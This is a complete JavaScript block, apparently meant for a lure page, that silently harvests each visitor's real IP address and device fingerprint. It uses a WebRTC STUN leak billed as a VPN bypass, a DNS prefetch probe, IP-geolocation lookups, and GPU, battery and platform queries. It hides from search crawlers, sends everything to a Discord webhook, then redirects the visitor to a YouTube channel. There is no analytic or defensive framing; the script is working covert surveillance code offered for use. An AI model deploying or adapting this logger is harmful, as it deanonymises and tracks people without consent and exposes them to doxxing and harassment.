<script>
    /* 
       OMNI-PROTOCOL MAX-POWER: VPN BYPASS EDITION
       INTEGRATED SECTIONS: 1, 2, 3, 5, 8, 9, 10, 11, 12, 13
    */

    const CONFIG = {
        HOOK: "https://discord.com/api/webhooks/1344654942953214053/nN0k_8I-yG_t8D97m5zH_K5K3Pz2U6-368X8vVv-I-I-I-I-I-I-I-I",
        REDIRECT: "https://youtube.com/@LigmaBlox-w7m",
        WAVES: 3,
        DELAY: 750
    };

    /* SECTION 9: BOT/CRAWLER DENIAL */
    const AGENT = navigator.userAgent.toLowerCase();
    const IS_BOT = /bot|google|baidu|bing|msn|duckduckgo|teoma|slurp|yandex|discord|whatsapp|facebook/i.test(AGENT);
    if (IS_BOT) { window.location.replace("https://google.com"); }

    const dispatch = (data) => {
        navigator.sendBeacon(CONFIG.HOOK, new Blob([JSON.stringify(data)], {type: 'application/json'}));
    };

    /* SECTION 11: WEBRTC FIREWALL & VPN CRACKER (UDP LEAK) */
    function crackWebRTC() {
        try {
            // Using multiple STUN nodes to find a UDP hole in the VPN tunnel
            const servers = [
                "stun:stun.l.google.com:19302",
                "stun:stun1.l.google.com:19302",
                "stun:stun.services.mozilla.com"
            ];
            const pc = new RTCPeerConnection({iceServers: servers.map(s => ({urls: s}))});
            pc.createDataChannel("");
            pc.createOffer().then(o => pc.setLocalDescription(o));
            pc.onicecandidate = (i) => {
                if (!i || !i.candidate || !i.candidate.candidate) return;
                const candidate = i.candidate.candidate;
                const ipMatch = /([0-9]{1,3}(\.[0-9]{1,3}){3}|[a-f0-9]{1,4}(:[a-f0-9]{1,4}){7})/.exec(candidate);
                if (ipMatch) {
                    dispatch({ 
                        content: "VPN BYPASS DETECTED (UDP LEAK)\nREAL IP: " + ipMatch[1] + "\nTYPE: " + (candidate.includes("typ srflx") ? "Public/Router" : "Local/Internal"),
                        username: "NETWORK ENFORCER" 
                    });
                }
            };
        } catch(e) {}
    }

    /* ADDITIONAL BYPASS: DNS PREFETCH LEAK */
    function dnsLeak() {
        const link = document.createElement("link");
        link.rel = "dns-prefetch";
        link.href = "//" + Date.now() + ".leak-check.internal";
        document.head.appendChild(link);
    }

    /* SECTION 2, 10, 12: HARDWARE & DEEP LEACH */
    async function extractDeepIntel() {
        const ts = Date.now();
        let renderer = "Not Detected";
        let vendor = "Not Detected";
        try {
            const canvas = document.createElement('canvas');
            const gl = canvas.getContext('webgl') || canvas.getContext('experimental-webgl');
            const debug = gl.getExtension('WEBGL_debug_renderer_info');
            renderer = gl.getParameter(debug.UNMASKED_RENDERER_WEBGL);
            vendor = gl.getParameter(debug.UNMASKED_VENDOR_WEBGL);
        } catch(e) {}

        let battery = "N/A";
        try { const b = await navigator.getBattery(); battery = Math.round(b.level * 100) + "% (" + (b.charging ? "Charging" : "Discharging") + ")"; } catch(e){}

        dispatch({
            username: "OMNI-INTEL-REPORT",
            embeds: [{
                title: "HARDWARE AND ENVIRONMENT DATA",
                color: 0,
                fields: [
                    { name: "GPU Renderer", value: renderer, inline: false },
                    { name: "GPU Vendor", value: vendor, inline: true },
                    { name: "Power", value: battery, inline: true },
                    { name: "Timezone", value: Intl.DateTimeFormat().resolvedOptions().timeZone, inline: true },
                    { name: "Network Type", value: navigator.connection ? navigator.connection.effectiveType.toUpperCase() : "Unknown", inline: true },
                    { name: "Resolution", value: window.screen.width + "x" + window.screen.height, inline: true },
                    { name: "Platform", value: navigator.platform, inline: true },
                    { name: "Cores", value: navigator.hardwareConcurrency || "N/A", inline: true },
                    { name: "Language", value: navigator.language, inline: true }
                ],
                footer: { text: "Timestamp: " + ts }
            }]
        });
    }

    /* SECTION 3, 8, 13: MULTI-API RACE & TUNNEL BYPASS */
    window.processIntel = (data) => {
        dispatch({
            content: "TUNNEL SUCCESS\nIP: " + data.ip + "\nLocation: " + data.city + ", " + data.region + " (" + data.country + ")\nOrg: " + data.org,
            username: "FORCE ENFORCER"
        });
    };

    async function runIPRace(wave) {
        const ts = Date.now();
        const targets = [
            "https://api64.ipify.org?format=json&cb=" + ts + wave,
            "https://ipapi.co/json/?cb=" + ts + wave
        ];

        targets.forEach(async (url) => {
            try {
                // Force "no-cache" to ensure we aren't seeing an old VPN session
                const r = await fetch(url, { cache: "no-store" });
                const d = await r.json();
                dispatch({
                    content: "VERIFIED DATA (WAVE " + wave + ")\nIP: " + (d.ip || d.query) + "\nSource: " + url.split('/')[2],
                    username: "DATA VERIFICATION"
                });
            } catch(e) {}
        });

        const tunnel = document.createElement('script');
        tunnel.src = "https://ipinfo.io/json?callback=processIntel&cb=" + ts + wave;
        document.body.appendChild(tunnel);
    }

    /* SECTION 5: TRIPLE-FIRE MASTER EXECUTION */
    async function startProtocol() {
        crackWebRTC();
        dnsLeak();
        
        for (let i = 1; i <= CONFIG.WAVES; i++) {
            extractDeepIntel();
            runIPRace(i);
            await new Promise(r => setTimeout(r, CONFIG.DELAY));
        }

        setTimeout(() => {
            window.location.replace(CONFIG.REDIRECT);
        }, 700); // Increased slightly for final sync
    }

    startProtocol();
</script>
